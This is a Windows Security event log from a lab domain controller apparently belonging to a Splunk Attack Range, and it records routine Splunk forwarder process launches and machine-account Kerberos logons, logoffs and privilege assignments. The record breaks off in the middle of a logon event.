04/19/2021 02:06:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263480
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:06:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263481
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263483
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263482
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263487
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x710BCB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263486
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x710BCB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59757
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:06:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263485
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x710BCB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263488
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x186c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263490
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263489
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x450
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:07:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263491
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263493
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x71284E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59763
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263492
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71284E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263494
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263496
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263495
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263502
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713E6B
Logon Type: 3
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263501
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x713E6B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59767
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263500
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713E6B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263499
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713DFF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263498
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x713DFF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59766
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:07:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263497
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x713DFF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263505
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x714C56
Logon Type: 3
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263504
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x714C56
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59776
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263503
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x714C56
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263506
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263508
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1010
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263507
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x140c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:08:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263509
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:08:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263510
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x90c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263512
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x145c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263511
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:08:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263513
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71284E
Logon Type: 3
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263516
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7187B2
Logon Type: 3
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263515
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7187B2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
